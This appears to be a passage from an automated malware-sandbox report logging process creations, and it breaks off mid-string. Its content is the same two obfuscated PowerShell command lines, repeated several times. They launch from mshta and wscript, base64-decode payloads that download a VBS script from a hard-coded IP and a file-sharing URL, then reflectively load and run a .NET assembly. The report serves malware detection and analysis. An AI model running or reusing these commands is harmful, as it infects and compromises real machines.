Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cG